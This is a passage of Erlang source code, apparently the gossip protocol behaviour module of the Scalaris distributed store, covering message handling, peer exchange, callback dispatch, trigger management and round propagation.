{integrated_data, CBModule::cb_module(), current_round} |
{new_round, CBModule::cb_module(), NewRound::non_neg_integer()} |
{cb_msg, CBModule::cb_module(), Msg::comm:message()} |
{stop_gossip_task, CBModule::cb_module()} |
{no_msg}.
-type message() :: bh_message() | cb_message().
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% API
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% @doc Start the process of the gossip module. <br/>
%% Called by sup_dht_node, calls gen_component:start_link to start the process.
-spec start_link(pid_groups:groupname()) -> {ok, pid()}.
start_link(DHTNodeGroup) ->
gen_component:start_link(?MODULE, fun ?MODULE:on_inactive/2, [],
[{wait_for_init},
{pid_groups_join_as, DHTNodeGroup, gossip}]).
%% @doc Initialises the state of the gossip module. <br/>
%% Called by gen_component, results in on_inactive handler.
-spec init([]) -> state().
init([]) ->
State = #state{},
% initialise a base trigger
msg_delay:send_trigger(?FIRST_TRIGGER_DELAY, {gossip_trigger, 1}),
State.
%% @doc Activate the gossip module. <br/>
%% Called by dht_node_join. Activates process (when only node of the system)
%% or subscribes to the rm to activate on slide_finished messages. <br/>
%% Result of the activation is to switch to the on_active handler.
-spec activate(Neighbors::nodelist:neighborhood()) -> ok.
activate(Neighbors) ->
case nodelist:node_range(Neighbors) =:= intervals:all() of
true ->
% We're the first node covering the whole ring range.
% Start gossip right away because it's needed for passive
% load balancing when new nodes join the ring.
comm:send_local(pid_groups:get_my(gossip), {activate_gossip, Neighbors});
_ ->
% subscribe to ring maintenance (rm) for {slide_finished, succ} or {slide_finished, pred}
rm_loop:subscribe(self(), ?MODULE,
fun gossip:rm_filter_slide_msg/3,
fun gossip:rm_send_activation_msg/5, 1)
end.
%% @doc Globally removes all tombstones from previously stopped callback modules.
-spec remove_all_tombstones() -> ok.
remove_all_tombstones() ->
Msg = {?send_to_group_member, gossip, {remove_all_tombstones}},
bulkowner:issue_bulk_owner(uid:get_global_uid(), intervals:all(), Msg).
%% @doc Checks whether the received notification is a {slide_finished, succ} or
%% {slide_finished, pred} msg. Used as filter function for the ring maintanance.
-spec rm_filter_slide_msg(Neighbors, Neighbors, Reason) -> boolean() when
is_subtype(Neighbors, nodelist:neighborhood()),
is_subtype(Reason, rm_loop:reason()).
rm_filter_slide_msg(_OldNeighbors, _NewNeighbors, Reason) ->
Reason =:= {slide_finished, pred} orelse Reason =:= {slide_finished, succ}.
%% @doc Sends the activation message to the behaviour module (this module)
%% Used to subscribe to the ring maintenance for {slide_finished, succ} or
%% {slide_finished, pred} msg.
-spec rm_send_activation_msg(Subscriber, ?MODULE, Neighbours, Neighbours, Reason) -> ok when
is_subtype(Subscriber, pid()),
is_subtype(Neighbours, nodelist:neighborhood()),
is_subtype(Reason, rm_loop:reason()).
rm_send_activation_msg(_Pid, ?MODULE, _OldNeighbours, NewNeighbours, _Reason) ->
%% io:format("Pid: ~w. Self: ~w. PidGossip: ~w~n", [Pid, self(), Pid2]),
Pid = pid_groups:get_my(gossip),
comm:send_local(Pid, {activate_gossip, NewNeighbours}).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Main Message Loop
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%-------------------------- on_inactive ---------------------------%%
%% @doc Message handler during the startup of the gossip module.
-spec on_inactive(Msg::message(), State::state()) -> state().
on_inactive({activate_gossip, Neighbors}, State) ->
MyRange = nodelist:node_range(Neighbors),
State1 = state_set(status, init, State),
% subscribe to ring maintenance (rm)
rm_loop:subscribe(self(), ?MODULE,
fun gossip:rm_my_range_changed/3,
fun gossip:rm_send_new_range/5, inf),
% set range and notify cb modules about leader state
State2 = state_set(range, MyRange, State1),
Msg1 = case is_leader(MyRange) of
true -> {is_leader, MyRange};
false -> {no_leader, MyRange}
end,
State3 = lists:foldl(fun(CBModule, StateIn) ->
NewState = cb_notify_change(leader, Msg1, CBModule, StateIn),
NewState
end, State2, state_get(cb_modules, State2)),
State4 = init_gossip_tasks(Neighbors, State3),
State5 = msg_queue_send(State4),
% change handler to on_active
gen_component:change_handler(State5, fun ?MODULE:on_active/2);
on_inactive({gossip_trigger, TriggerInterval}=_Msg, State) ->
?TRACE_TRIGGER("[ Gossip ] on_inactive: ~w", [_Msg]),
handle_trigger(TriggerInterval, State);
on_inactive({p2p_exch, _CBModule, SourcePid, _PData, _Round}=Msg, State) ->
comm:send(SourcePid, {send_error, comm:this(), Msg, on_inactive}),
State;
on_inactive({p2p_exch_reply, _CBModule, SourcePid, _QData, _Round}=Msg, State) ->
comm:send(SourcePid, {send_error, comm:this(), Msg, on_inactive}),
State;
%% for debugging
on_inactive(print_state, State) ->
log:log(warn, "~s", [to_string(State)]),
State;
on_inactive({web_debug_info, _Requestor}=Msg, State) ->
msg_queue_add(Msg, State);
on_inactive({stop_gossip_task, _CBModule}=Msg, State) ->
msg_queue_add(Msg, State);
on_inactive({start_gossip_task, _CBModule, _Args}=Msg, State) ->
msg_queue_add(Msg, State);
on_inactive({remove_all_tombstones}=Msg, State) ->
msg_queue_add(Msg, State);
on_inactive({cb_msg, _CBModule, _msg}=Msg, State) ->
msg_queue_add(Msg, State);
%% consume all other message (inluding: trigger messages)
on_inactive(_Msg, State) ->
State.
%%--------------------------- on_active ----------------------------%%
%% @doc Message handler during the normal operation of the gossip module.
%% @end
-spec on_active(Msg::message(), State::state()) -> state().
on_active({deactivate_gossip}, _State) ->
rm_loop:unsubscribe(self(), ?MODULE),
gen_component:change_handler(#state{}, fun ?MODULE:on_inactive/2);
%% This message is received from self() from init_gossip_task or through
%% start_gossip_task()/bulkowner
on_active({start_gossip_task, CBModule, Args}, State) ->
CBModules = state_get(cb_modules, State),
State1 = case lists:member(CBModule, CBModules) of
true ->
log:log(warn, "[ Gossip ] Trying to start an already existing Module: ~w ."
++ "Request will be ignored.", [CBModule]),
State;
false -> init_gossip_task(CBModule, Args, State)
end,
State1;
%% Trigger message starting a new cycle.
on_active({gossip_trigger, TriggerInterval}=_Msg, State) ->
?TRACE_TRIGGER("[ Gossip ]:~w", [_Msg]),
State1 = handle_trigger(TriggerInterval, State),
case state_get({trigger_group, TriggerInterval}, State) of
false ->
State1; %% trigger group does not exist, do nothing (e.g. during startup)
CBModules ->
[ comm:send_local(self(), {trigger_action, CBModule}) || CBModule <- CBModules ],
State1
end;
on_active({trigger_action, CBModule}=_Msg, State) ->
State1 = msg_queue_send(State),
case state_get({trigger_lock, CBModule}, State1) of
free ->
log:log(debug, "[ Gossip ] Module ~w got triggered", [CBModule]),
log:log(?SHOW, "[ Gossip ] Cycle: ~w, Round: ~w",
[state_get({cycle, CBModule}, State1), state_get({round, CBModule}, State1)]),
%% set cycle status to active
State2 = state_set({trigger_lock, CBModule}, locked, State1),
%% reset exch_data
State3 = state_set({exch_data, CBModule}, {undefined, undefined}, State2),
%% request node (by the cb module or the bh module)
State4 = case cb_select_node(CBModule, State3) of
{true, NewState} -> NewState;
{false, NewState} -> request_random_node(CBModule), NewState
end,
%% request data
State5 = cb_select_data(CBModule, State4),
State5;
locked -> State1 % ignore trigger when within prepare-request phase
end;
%% received through the rm on key range changes
on_active({update_range, NewRange}, State) ->
State1 = state_set(range, NewRange, State),
Msg = case is_leader(NewRange) of
true -> {is_leader, NewRange};
false -> {no_leader, NewRange}
end,
Fun = fun (CBModule, StateIn) ->
StateOut = cb_notify_change(leader, Msg, CBModule, StateIn),
StateOut
end,
CBModules = state_get(cb_modules, State1),
lists:foldl(Fun, State1, CBModules);
%% request for debug info
on_active({web_debug_info, Requestor}, State) ->
CBModules = state_get(cb_modules, State),
Fun = fun(CBModule, {KVListIn, StateIn}) ->
{KVListCBModule, NewState} = cb_web_debug_info(CBModule, StateIn),
{KVListIn ++ [{"",""}] ++ KVListCBModule, NewState}
end,
{KVListCBModule, State1} = lists:foldr(Fun, {[], State}, CBModules),
KVListAll = [{"",""}] ++ web_debug_info(State) ++ KVListCBModule,
comm:send_local(Requestor, {web_debug_info_reply, KVListAll}),
State1;
%% received from shepherd, from on_inactive or from rejected messages
on_active({send_error, _Pid, Msg, Reason}=ErrorMsg, State) ->
% unpack msg if necessary
MsgUnpacked = case Msg of
% msg from shepherd
{_, ?MODULE, OriginalMsg} -> OriginalMsg;
% other send_error msgs, e.g. from on_inactive
_Msg -> _Msg
end,
CBStatus = state_get({cb_status, element(2, MsgUnpacked)}, State),
case MsgUnpacked of
_ when CBStatus =:= tombstone ->
log:log(warn(), "[ Gossip ] Got ~w msg for tombstoned module ~w. Reason: ~w. Original Msg: ~w",
[element(1, ErrorMsg), element(2, MsgUnpacked), Reason, element(1, Msg)]),
State;
{p2p_exch, CBModule, _SourcePid, PData, Round} ->
log:log(warn(), "[ Gossip ] p2p_exch from ~w (gossip) to ~w (dht_node)" ++
" failed because of ~w", [_SourcePid, _Pid, Reason]),
NewState1 = cb_notify_change(exch_failure, {p2p_exch, PData, Round}, CBModule, State),
NewState1;
{p2p_exch_reply, CBModule, _SourcePid, QData, Round} ->
log:log(warn(), "[ Gossip ] p2p_exch_reply failed because of ~w", [Reason]),
NewState1 = cb_notify_change(exch_failure, {p2p_exch_reply, QData, Round}, CBModule, State),
NewState1;
_ ->
log:log(?SHOW, "[ Gossip ] Failed to deliever the Msg ~w because ~w", [Msg, Reason]),
State
end;
%% unpack bulkowner msg
on_active({bulkowner, deliver, _Id, _Range, Msg, _Parents}, State) ->
comm:send_local(self(), Msg),
State;
%% received through remove_all_tombstones()/bulkowner
on_active({remove_all_tombstones}, State) ->
lists:foldl(fun(CBModule, StateIn) -> state_remove({cb_status, CBModule}, StateIn) end,
State, get_tombstones(State));
%% for debugging
on_active(print_state, State) ->
log:log(warn, "~s", [to_string(State)]),
State;
%% for debugging
on_active({get_state, SourcePid}, State) ->
comm:send(SourcePid, State),
%% log:log(warn, "~s", [to_string(State)]),
State;
%% Only messages for callback modules are expected to reach this on_active clause.
%% they have the form:
%% {MsgTag, CBModule, ...}
%% element(1, Msg) = MsgTag
%% element(2, Msg) = CBModule
on_active(Msg, State) ->
State1 = try state_get({cb_status, element(2, Msg)}, State) of
tombstone ->
log:log(warn(), "[ Gossip ] Got ~w msg for tombstoned module ~w",
[element(1, Msg), element(2, Msg)]),
State;
started ->
handle_msg(Msg, State);
false ->
log:log(warn, "[ Gossip ] Unknown Callback Module: ~w", [element(2, Msg)]),
State
catch
_:_ -> log:log(warn, "[ Gossip ] Unknown msg: ~w", [Msg]),
State
end,
State1.
%% This message is received as a response to a get_subset message to the
%% cyclon process and should contain a list of random nodes.
-spec handle_msg(Msg::cb_message(), State::state()) -> state().
% re-request node if node list is empty
handle_msg({selected_peer, CBModule, _Msg={cy_cache, []}}, State) ->
Delay = cb_config(trigger_interval, CBModule),
request_random_node_delayed(Delay, CBModule),
State;
handle_msg({selected_peer, CBModule, _Msg={cy_cache, Nodes}}, State) ->
log:log(info, "selected_peer: ~w, ~w", [CBModule, _Msg]),
{_Node, PData} = state_get({exch_data, CBModule}, State),
case PData of
undefined -> state_set({exch_data, CBModule}, {Nodes, undefined}, State);
_ -> start_p2p_exchange(Nodes, PData, CBModule, State)
end;
%% This message is a reply from a callback module to CBModule:select_data()
handle_msg({selected_data, CBModule, PData}, State) ->
% check if a peer has been received already
{Peer, _PData} = state_get({exch_data, CBModule}, State),
case Peer of
undefined -> state_set({exch_data, CBModule}, {undefined, PData}, State);
_ -> start_p2p_exchange(Peer, PData, CBModule, State)
end;
%% This message is a request from another peer (i.e. another gossip module) to
%% exchange data, usually results in CBModule:select_reply_data()
handle_msg({p2p_exch, CBModule, SourcePid, PData, OtherRound}=Msg, State) ->
log:log(debug, "[ Gossip ] p2p_exch msg received from ~w. PData: ~w",[SourcePid, PData]),
State1 = state_set({reply_peer, Ref=uid:get_pids_uid()}, SourcePid, State),
case check_round(OtherRound, CBModule, State1) of
{ok, State2} ->
cb_select_reply_data(PData, Ref, OtherRound, Msg, CBModule, State2);
{start_new_round, State2} -> % self is leader
?TRACE_ROUND("[ Gossip ] Starting a new round in p2p_exch", []),
State3 = cb_notify_change(new_round, state_get({round, CBModule}, State2), CBModule, State2),
State4 = cb_select_reply_data(PData, Ref, OtherRound, Msg, CBModule, State3),
comm:send(SourcePid, {new_round, CBModule, state_get({round, CBModule}, State4)}),
State4;
{enter_new_round, State2} ->
?TRACE_ROUND("[ Gossip ] Entering a new round in p2p_exch", []),
State3 = cb_notify_change(new_round, state_get({round, CBModule}, State2), CBModule, State2),
State4 = cb_select_reply_data(PData, Ref, OtherRound, Msg, CBModule, State3),
State4;
{propagate_new_round, State2} -> % i.e. MyRound > OtherRound
?TRACE_ROUND("[ Gossip ] propagate round in p2p_exch", []),
State3 = cb_select_reply_data(PData, Ref, OtherRound, Msg, CBModule, State2),
comm:send(SourcePid, {new_round, CBModule, state_get({round, CBModule}, State3)}),
State3
end;
%% This message is a reply from a callback module to CBModule:select_reply_data()
handle_msg({selected_reply_data, CBModule, QData, Ref, Round}, State)->
case take_reply_peer(Ref, State) of
{none, State1} ->
log:log(warn, "[ Gossip ] Got 'selected_reply_data', but no matching reply peer stored in State.");
{Peer, State1} ->
comm:send(Peer, {p2p_exch_reply, CBModule, comm:this(), QData, Round}, [{shepherd, self()}])
end,
log:log(debug, "[ Gossip ] selected_reply_data. CBModule: ~w, QData ~w",
[CBModule, QData]),
State1;
%% This message is a reply from another peer (i.e. another gossip module) to
%% a p2p_exch request, usually results in CBModule:integrate_data()
handle_msg({p2p_exch_reply, CBModule, SourcePid, QData, OtherRound}=Msg, State) ->
log:log(debug, "[ Gossip ] p2p_exch_reply, CBModule: ~w, QData ~w", [CBModule, QData]),
case check_round(OtherRound, CBModule, State) of
{ok, State1} ->
cb_integrate_data(QData, OtherRound, Msg, CBModule, State1);
{start_new_round, State1} -> % self is leader
?TRACE_ROUND("[ Gossip ] Starting a new round p2p_exch_reply", []),
State2 = cb_notify_change(new_round, state_get({round, CBModule}, State1), CBModule, State1),
State3 = cb_integrate_data(QData, OtherRound, Msg, CBModule, State2),
comm:send(SourcePid, {new_round, CBModule, state_get({round, CBModule}, State3)}),
State3;
{enter_new_round, State1} ->
?TRACE_ROUND("[ Gossip ] Entering a new round p2p_exch_reply", []),
State2 = cb_notify_change(new_round, state_get({round, CBModule}, State1), CBModule, State1),
cb_integrate_data(QData, OtherRound, Msg, CBModule, State2);
{propagate_new_round, State1} -> % i.e. MyRound > OtherRound
?TRACE_ROUND("[ Gossip ] propagate round in p2p_exch_reply", []),
comm:send(SourcePid, {new_round, CBModule, state_get({round, CBModule}, State1)}),
cb_integrate_data(QData, OtherRound, Msg, CBModule, State1)
end;
%% This message is a reply from a callback module to CBModule:integrate_data()
%% Markes the end of a cycle
handle_msg({integrated_data, CBModule, cur_round}, State) ->
state_update({cycle, CBModule}, fun (X) -> X+1 end, State);
% finishing an old round should not affect cycle counter of current round
handle_msg({integrated_data, _CBModule, prev_round}, State) ->
State;
%% pass messages for callback modules to the respective callback module
%% messages to callback modules need to have the form {cb_msg, CBModule, Msg}.
%% Use envelopes if necessary.
handle_msg({cb_msg, CBModule, Msg}, State) ->
cb_handle_msg(Msg, CBModule, State);
% round propagation message
handle_msg({new_round, CBModule, NewRound}, State) ->
MyRound = state_get({round, CBModule}, State),
if
MyRound < NewRound ->
?TRACE_ROUND("[ Gossip ] Entering new round via round propagation message", []),
State1 = cb_notify_change(new_round, NewRound, CBModule, State),
State2 = state_set({round, CBModule}, NewRound, State1),
state_set({cycle, CBModule}, 0, State2);
MyRound =:= NewRound -> % i.e. the round propagation msg was already received
?TRACE_ROUND("[ Gossip ] Received propagation msg for round i'm already in", []),
State;
MyRound > NewRound ->
?TRACE_ROUND("[ Gossip ] MyRound > OtherRound", []),
State
end;
%% Received through stop_gossip_task/bulkowner
%% Stops gossip tasks and cleans state of all garbage
%% sets tombstone to handle possible subsequent request for already stopped tasks
handle_msg({stop_gossip_task, CBModule}, State) ->
log:log(?SHOW, "[ Gossip ] Stopping ~w", [CBModule]),
% shutdown callback module
State1 = cb_shutdown(CBModule, State),
% delete callback module dependent entries from state
State2 = state_remove_cb(CBModule, State1),
% remove from list of modules
State3 = state_update(cb_modules, fun(Modules) -> lists:delete(CBModule, Modules) end, State2),
% remove from trigger group
Interval = cb_config(trigger_interval, CBModule) div 1000,
CBModules = state_get({trigger_group, Interval}, State),
NewCBModules = lists:delete(CBModule, CBModules),
State4 = case NewCBModules of
[] ->
NewState = state_set({trigger_group, Interval}, NewCBModules, State3),
state_update(trigger_remove, fun (Intervals) -> [Interval|Intervals] end, NewState);
_ ->
state_set({trigger_group, Interval}, NewCBModules, State3)
end,
% set tombstone
State5 = state_set({cb_status, CBModule}, tombstone, State4),
State5.
%% @doc Renew trigger message and handle adding/removal of triggers.
%% To avoid infecting mpath traces with infinite triggers, a basetrigger with
%% interval 1s is started during the startup of the process. This trigger is
%% uninfected, even if it belongs to a node which was added during infection.
%%
%% To add and remove callback module specific triggers without infecting the triggers,
%% the request for the addition/removel of a trigger is saved to the state and
%% processed during the handling of the base trigger.
-spec handle_trigger(TriggerInterval::non_neg_integer(), state()) -> state().
handle_trigger(TriggerInterval, State) ->
% check for trigger removal
State1 = case lists:member(TriggerInterval, state_get(trigger_remove, State)) of
true -> % remove trigger by not renewing the trigger
?TRACE_TRIGGER("Remove trigger: ~w", [TriggerInterval]),
% unconditionally renew basetrigger, even if the last trigger was removed
if TriggerInterval =:= 1 ->
msg_delay:send_trigger(TriggerInterval, {gossip_trigger, TriggerInterval});
TriggerInterval =/= 1 -> ok
end,
state_update(trigger_remove,
fun (Triggers) -> lists:delete(TriggerInterval, Triggers) end, State);
false -> % renew trigger
msg_delay:send_trigger(TriggerInterval, {gossip_trigger, TriggerInterval}),
State
end,
% check for new new triggers to add
case state_get(trigger_add, State1) of
[] -> State1;
NewTriggerIntervals ->
?TRACE_TRIGGER("Add triggers: ~w", [NewTriggerIntervals]),
lists:foreach(fun (NewTriggerInterval) ->
msg_delay:send_trigger(NewTriggerInterval, {gossip_trigger, NewTriggerInterval})
end, NewTriggerIntervals),
state_set(trigger_add, [], State1)
end.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Msg Exchange with Peer
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% called by either on({selected_data,...}) or on({selected_peer, ...}),
% depending on which finished first
-spec start_p2p_exchange(Peers::[node:node_type(),...], PData::gossip_beh:exch_data(),
CBModule::cb_module(), State::state()) -> state().
start_p2p_exchange(Peers, PData, CBModule, State) ->
SendToPeer = fun(Peer, StateIn) ->
case node:is_me(Peer) of
false ->
%% log:log(warn, "starting p2p exchange. Peer: ~w~n",[Peer]),
?SEND_TO_GROUP_MEMBER(
node:pidX(Peer), gossip,
{p2p_exch, CBModule, comm:this(), PData, state_get({round, CBModule}, StateIn)}),
state_set({trigger_lock, CBModule}, free, StateIn);
true ->
%% todo does this really happen??? cyclon should not have itself in the cache
log:log(?SHOW, "[ Gossip ] Node was ME, requesting new node"),
request_random_node(CBModule),
{Peer, Data} = state_get({exch_data, CBModule}, StateIn),
state_set({exch_data, CBModule}, {undefined, Data}, StateIn)
end
end,
lists:foldl(SendToPeer, State, Peers).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Interacting with the Callback Modules
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% called when activating gossip module
-spec init_gossip_tasks(nodelist:neighborhood(), state()) -> state().
init_gossip_tasks(Neighbors, State) ->
Init = fun (CBModule, StateIn) ->
_StateOut = init_gossip_task(CBModule, [{neighbors, Neighbors}], StateIn)
end,
lists:foldl(Init, State, ?CBMODULES).
%% initialises a gossip task / callback mdoule
%% called on activation of gossip module or on start_gossip_task message
-spec init_gossip_task(CBModule::cb_module(), Args::list(), State::state()) -> state().
init_gossip_task(CBModule, Args, State) ->
% initialize CBModule
CBState = cb_init([{instance, CBModule} | Args], CBModule),
State1 = state_set({cb_state, CBModule}, CBState, State),
State2 = lists:foldl(fun({Key, Value}, StateIn) -> state_set({Key, CBModule}, Value, StateIn) end,
State1,
[{cb_status, started}, {cycle, 0}, {exch_data,
{undefined, undefined}}, {round, 0}, {trigger_lock, free}]
),
% notify cb module about leader state
MyRange = state_get(range, State2),
LeaderMsg = case is_leader(MyRange) of
true -> {is_leader, MyRange};
false -> {no_leader, MyRange}
end,
State3 = cb_notify_change(leader, LeaderMsg, CBModule, State2),
% configure and add trigger
TriggerInterval = cb_config(trigger_interval, CBModule) div 1000,
?TRACE_TRIGGER("Initiating Trigger for ~w. Interval: ~w", [CBModule, TriggerInterval]),
{TriggerGroup, State4} =
case state_get({trigger_group, TriggerInterval}, State3) of
false ->
% create and init new trigger group and request the new trigger
NewState1 = state_update(trigger_add, fun (List) -> [TriggerInterval|List] end, State3),
{[CBModule], NewState1};
OldTriggerGroup ->
% add CBModule to existing trigger group
{[CBModule|OldTriggerGroup], State3}
end,
State5 = state_set({trigger_group, TriggerInterval}, TriggerGroup, State4),
% add CBModule to list of cbmodules
state_update(cb_modules, fun(CBModules) -> [CBModule|CBModules] end, State5).
%% @doc Calls the config function FunName of the callback module.
%% Allowed config functions are:
%% <ul>
%% <li> fanout: the number of peers contacted per cycle </li>
%% <li> min_cycles_per_round: The minimum number of cycles per round </li>
%% <li> man_cycles_per_round: The maximum number of cycles per round </li>
%% <li> trigger_interval: The time interval in ms after which a new cycle
%% is triggered </li>
%% </ul>
-spec cb_config(FunName, CBModule) -> non_neg_integer() when
is_subtype(FunName, fanout | min_cycles_per_round | max_cycles_per_round | trigger_interval),
is_subtype(CBModule, cb_module()).
cb_config(FunName, {ModuleName, _Id}) ->
apply(ModuleName, FunName, []).
%% @doc Called upon startup and calls CBModule:init().
%% It calls the init function with the given arguments. It is usually used
%% to initialise the state of the callback module.
-spec cb_init(Args::list(proplists:property()), cb_module()) -> CBState::any().
cb_init(Args, {ModuleName, _Id}) ->
{ok, CBState} = apply(ModuleName, init, [Args]), CBState.
%% @doc Called at the beginning of every cycle and calls CBModule:select_node().
%% Should return true, if the peer selection is to be done by behaviour module,
%% false otherwise. If false is returned, the behaviour module expects a
%% selected_peer message.
-spec cb_select_node(cb_module(), state()) -> {boolean(), state()}.
cb_select_node(CBModule, State) ->
cb_call(select_node, [], CBModule, State).
%% @doc Called at the beginning of a cycle and calls CBModule:select_data().
%% The callback module has to select the exchange data to be sent to the
%% peer. The exchange data has to be sent back to the gossip module as a
%% message of the form {selected_data, Instance, ExchangeData}.
%% If 'discard_msg' is returned, the current trigger is ignored.
%% (Note: Storing the trigger in the message queue would lead to self-accelerating
%% recursion of storing and triggering)
-spec cb_select_data(cb_module(), state()) -> state().
cb_select_data(CBModule, State) ->
case cb_call(select_data, [], CBModule, State) of
{ok, State1} ->
State1;
{discard_msg, State1} ->
state_set({trigger_lock, CBModule}, free, State1)
end.
%% @doc Called upon a p2p_exch message and calls CBModule::select_reply_data().
%% Passes the PData from a p2p_exch request to the callback module. The callback
%% module has to select the exchange data to be sent to the peer. The Ref is
%% used by the behaviour module to identify the request.
%% The RoundStatus and Round information can be used for special handling
%% of messages from previous rounds.
%% The selected reply data is to be sent back to the behaviour module as a
%% message of the form {selected_reply_data, Instance, QData, Ref, Round}.
%% On certain return values, the reply_peer is removed from the state of the
%% gossip module. This is necessary if the callback module will not send an
%% selected_reply_data message (because the message is dscarded or sent back directly).
-spec cb_select_reply_data(PData::gossip_beh:exch_data(), Ref::pos_integer(),
Round::non_neg_integer(), Msg::message(), CBModule::cb_module(), State::state()) -> state().
cb_select_reply_data(PData, Ref, Round, Msg, CBModule, State) ->
case cb_call(select_reply_data, [PData, Ref, Round], CBModule, State) of
{ok, State1} -> State1;
{discard_msg, State1} ->
{_Peer, State2} = take_reply_peer(Ref, State1),
State2;
{retry, State1} ->
{_Peer, State2} = take_reply_peer(Ref, State1),
msg_queue_add(Msg, State2);
{send_back, State1} ->
{p2p_exch, _, SourcePid, _, _} = Msg,
comm:send(SourcePid, {send_error, comm:this(), Msg, message_rejected}),
{_Peer, State2} = take_reply_peer(Ref, State1),
State2
end.
%% @doc Called by the upon a p2p_exch message and calls CBModule:integrate_data().
%% Passes the QData from a p2p_exch_reply to the callback module. Upon finishing
%% the processing of the data, a message of the form
%% {integrated_ data, Instance, RoundStatus} is to be sent to the gossip module.
-spec cb_integrate_data(QData::gossip_beh:exch_data(), OtherRound::non_neg_integer(),
message(), cb_module(), state()) -> state().
cb_integrate_data(QData, OtherRound, Msg, CBModule, State) ->
{RetVal, State1} = cb_call(integrate_data, [QData, OtherRound], CBModule, State),
if RetVal =:= retry ->
msg_queue_add(Msg, State1);
RetVal =:= send_back ->
{p2p_exch_reply,_,SourcePid,_,_} = Msg,
comm:send(SourcePid, {send_error, comm:this(), Msg, message_rejected}),
State1;
RetVal =:= ok orelse RetVal =:= discard_msg ->
State1
end.
%% @doc Called upon messages of the form {cb_msg, CBModule, Msg} and calls
%% CBModule:handle_msg().
%% Passes the message Msg to the callback module, used to handle messages
%% for the callback module.
-spec cb_handle_msg(comm:message(), cb_module(), state()) -> state().
cb_handle_msg(Msg, CBModule, State) ->
{ok, State1} = cb_call(handle_msg, [Msg], CBModule, State), State1.
%% @doc Called upon {web_debug_info} messages and calls CBModule:web_debug_info().
%% The callback module has to return debugging infos, to be displayed in the
%% Scalaris Web Debug Interface.
-spec cb_web_debug_info(cb_module(), state()) ->
{[{Key::string(), Value::any()}], state()}.
cb_web_debug_info(CBModule, State) ->
cb_call(web_debug_info, [], CBModule, State).
%% @doc Called upon every p2p_exch/p2p_exch_reply message and calls
%% CBmodule:round_has_converged().
%% The callback module should return true if the current round has converged
%% to a stable value, false otherwise (refers to gossip based aggregation
%% protocols implementing a convergence criterion).
-spec cb_round_has_converged(cb_module(), state()) -> {boolean(), state()}.
cb_round_has_converged(CBModule, State) ->
cb_call(round_has_converged, [], CBModule, State).
%% @doc Called to notify the callback module about certain state changes indepent
%% of the standard message loop.
%% Used to notify a callback module about
%% <ul>
%% <li> 'new_round': the starting of a new round </li>
%% <li> 'leader': changes in the key range of the node. The MsgTag indicates
%% whether the node is a leader or not, the NewRange is the new
%% key range of the node </li>
%% <li> 'exch_failure': a failed message delivery, including exchange
%% Data and Round from the original message </li>
%% </ul>
-spec cb_notify_change(Tag::new_round, Round::non_neg_integer(), cb_module(), state()) -> state();
(Tag::leader, {is_leader|no_leader, intervals:interval()}, cb_module(), state()) -> state();
(Tag::exch_failure, {MsgTag::atom(), Data::any(), Round::non_neg_integer()}, cb_module(), state()) -> state().
cb_notify_change(Tag, Notification, CBModule, State) ->
{ok, State1} = cb_call(notify_change, [Tag,Notification], CBModule, State),
State1.
%% @doc Called upon stop_gossip_task(CBModule) and calls CBModule:shutdown().
%% It should be the opposite of init() and do any necessary clean up.
-spec cb_shutdown(cb_module(), state()) -> state().
cb_shutdown(CBModule, State) ->
{ok, State1} = cb_call(shutdown, [], CBModule, State), State1.
%% @doc Helper function for the cb_* functions.
%% Adds the state of the respective callback module to the Args, calls the
%% given function and repacks the returned client state.
-spec cb_call(cb_fun_name(), list(), cb_module(), state()) -> {ReturnValue::any(), state()}.
cb_call(FunName, Args, CBModule={ModuleName, _InstanceId}, State) when is_atom(ModuleName) ->
Args1 = Args ++ [state_get({cb_state, CBModule}, State)],
{ReturnValue, ReturnedCBState} = apply(ModuleName, FunName, Args1),
{ReturnValue, state_set({cb_state, CBModule}, ReturnedCBState, State)}.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Requesting Peers
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% @doc Sends the local node's cyclon process an enveloped request for a random node.
%% on_active({selected_peer, CBModule, {cy_cache, Cache}}, State) will handle the response
-spec request_random_node(CBModule::cb_module()) -> ok.
request_random_node(CBModule) ->
EnvPid = comm:reply_as(self(), 3, {selected_peer, CBModule, '_'}),
Fanout = cb_config(fanout, CBModule),
comm:send_local(self(), {cb_msg, {gossip_cyclon, default},
{get_subset_rand, Fanout, EnvPid}}).
%% Used for rerequesting peers from cyclon when cyclon returned an empty list,
%% which is usually the case during startup.
%% The delay prohibits bombarding the cyclon process with requests.
-spec request_random_node_delayed(Delay::0..4294967295, CBModule::cb_module()) ->
ok.
request_random_node_delayed(Delay, CBModule) ->
EnvPid = comm:reply_as(self(), 3, {selected_peer, CBModule, '_'}),
Fanout = cb_config(fanout, CBModule),
msg_delay:send_local(Delay div 1000, self(), {cb_msg, {gossip_cyclon, default},
{get_subset_rand, Fanout, EnvPid}}).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Round Handling
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% called at every p2p_exch and p2p_exch_reply message
-spec check_round(OtherRound::non_neg_integer(), CBModule::cb_module(), State::state())
-> {ok | start_new_round | enter_new_round | propagate_new_round, state()}.
